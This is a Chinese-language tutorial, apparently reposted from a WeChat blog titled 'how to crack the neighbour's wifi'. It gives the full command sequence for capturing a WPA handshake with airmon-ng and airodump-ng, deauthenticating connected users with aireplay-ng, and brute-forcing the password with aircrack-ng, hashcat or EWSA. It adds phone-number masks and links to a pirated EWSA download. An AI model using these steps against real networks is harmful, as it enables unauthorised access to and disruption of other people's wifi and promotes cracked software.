如何破解wifi

0x01 准备

1.kali等操作系统2.支持监听模式的网卡，如RT3070、RTL81873.信号好的wifi，且该wifi有设备正在连接

0x02 获取握手包

1.将网卡连接到虚拟机2.使用iwconfig查看网卡，一般为wlan0

1.使用airmon-ng start wlan0开启监听模式2.再次使用iwconfig查看网卡，查看网卡名称是否为wlan0mon

1.输入airodump-ng wlan0mon扫描周围wifi信息，PWR越靠近0代表信号越强，下方的部分是连接到wifi的客户端。找到合适的wifi后需要记下CH BSSID。

1.输入airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w ~/ wlan0mon开始抓包，并将握手包保存到根目录下

1.使用aireplay-ng -0 2 -a BSSID -c STATION wlan0mon将用户强制踢下线，用户下线后会自动连接wifi，届时即可抓到握手包。2.当抓到握手包的时候箭头处会显示”handshake“字样

0x03 破解握手包

推荐使用Windows下的ewsa进行破解，也可以使用hashcat等软件，不推荐aircrack。aircrack-ng使用的是cpu进行爆破，我i9-13900hx，给kali分配了4个核，爆破速度也才2000/s，使用4060+cpu+核显的爆破速度为40-45w/s。

aircrack-ng 破解握手包

aircrack-ng '/home/kali/Desktop/1.cap' -w /usr/share/wordlists/rockyou.txt

密码找到后如图所示：

hashcat 破解握手包

没玩明白，请参考https://blog.csdn.net/qq_29176323/article/details/115403581使用显卡+hashcat破解握手包_显卡 跑 cap_千年恨的博客-CSDN博客^[1]

EWSA破解握手包

下载地址：EWSA Pro最新版v7.40.821中文注册版 - 哔哩哔哩 (bilibili.com)^[2]https://www.bilibili.com/read/cv23936832/

下载地址 链接：https://pan.baidu.com/s/1CJVjaOu8JvoRiEu89gJcmA?pwd=vlj1 提取码：vlj1

解压密码“500W专业跑包” 解压密码“500W专业跑包” 别再问了，消失的眼角膜啊~ 作者：LH丶tao https://www.bilibili.com/read/cv23936832/ 出处：bilibili

下载，安装，破解

导入tcpdump数据

点击破解选项

这边着重讲一下掩码破解，?d代表的就是0-9的任意数字，?d(0-3)代表的是0123这四个数字。假如我们要破解8位数字，则掩码为?d?d?d?d?d?d?d?d，例如我们要破解130,131,132,133,134,135,136,137,138,139开头的手机号，则掩码为13?d?d?d?d?d?d?d?d?d

在选项处，选择cpu和gpu后，开始破解，等待爆破出密码

References

[1] 使用显卡+hashcat破解握手包_显卡 跑 cap_千年恨的博客-CSDN博客: https://blog.csdn.net/qq_29176323/article/details/115403581
[2] EWSA Pro最新版v7.40.821中文注册版 - 哔哩哔哩 (bilibili.com): https://www.bilibili.com/read/cv23936832/

原文始发于微信公众号（代码小铺）：如何破解邻居wifi